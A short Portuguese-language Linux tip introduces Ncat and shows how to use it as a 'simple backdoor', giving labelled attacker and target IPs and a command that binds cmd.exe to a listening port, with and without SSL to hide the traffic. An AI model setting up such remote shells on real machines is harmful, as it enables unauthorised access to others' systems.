Ncat com SSL

Publicado por Roberto Soares (3spreto) em 07/11/2011

[ Hits: 5.817 ]

Blog: http://codesec.blogspot.com

 


Ncat com SSL



Acredito que a grande maioria conhece o Netcat, não? Pois bem, em uma espécie de variação, surge o Ncat. Sim, são diferentes antes que perguntem. Porém a grande maioria de suas funcionalidades se assemelham comparando-as entre si.

O Ncat utiliza os protocolos TCP e UDP para sua comunicação e também funciona sobre o IPv4 e o IPv6. Uma das características mais simples do Ncat é a transferência de dados entre dois Hosts (Linux <--> Linux, Windows <--> Windows ou Linux <--> Windows) de forma simplificada.

Também nos dá a possibilidade de executar comandos remotamente como se estivéssemos em nossa própria máquina, ainda se não bastasse, conseguimos prover uma "dose" considerável de segurança, utilizando o SSL (Secure Sockets Layer), que é um protocolo criptográfico responsável por prover uma comunicação segura sob a Internet.

Imagine isso para um backdoor simples heim?

Onde:
  • 192.168.0.125 é o IP do atacante. (BackTrack)
  • 192.168.0.147 é o IP do alvo. (XP)

Sem SSL

No alvo digite o comando:

ncat.exe -v -l 1337 -e cmd --allow 192.168.0.125
Linux: Ncat com SSL
E na máquina do atacante digite:

# ncat -v 192.168.0.147 1337
Linux: Ncat com SSL

Com SSL

No alvo digite o comando:

ncat.exe -v -l 1337 --ssl -e cmd --allow 192.168.0.125
Linux: Ncat com SSL
E na máquina do atacante digite:

# ncat -v --ssl 192.168.0.147 1337
Linux: Ncat com SSL
Agora utilize o wireshark com apenas o filtro "tcp". Em ambas as formas, clique com o botão direito do mouse nas conexões tcp e vá em "Follow Stream" e compare. :D

Ncat Help
Linux: Ncat com SSL

Transferência de arquivos

Ok, ok, antes de perguntarem sobre como efetuar a transferência de um arquivo entre 2 Hosts Linux, aqui vai os comandos.

Máquina que receberá o arquivo.
Linux: Ncat com SSL
Máquina que enviará o arquivo.
Linux: Ncat com SSL
Veja o novo conteúdo do arquivo.
Linux: Ncat com SSL

Links

Previamente publicada em: Até a próxima!
:wq!

Outras dicas deste autor

theHarvester - Vamos colher alguns e-mails?

Brakeman - Rails Security Scanner

Proteção contra vulnerabilidade POODLE SSLv3

Instalando o nginx no CentOS 7

VirusZoo - Um zoológico diferente

Leitura recomendada

Backtrack 4 - Atualizando pasta de exploits através do site milw0rm

Bloqueando portas com IPtables

Fechando a porta 6000 do X

Portas do Samba no IPTables

Fechando portas sem usar firewall

  

Comentários

Nenhum comentário foi encontrado.



Contribuir com comentário




Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner
Linux banner
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts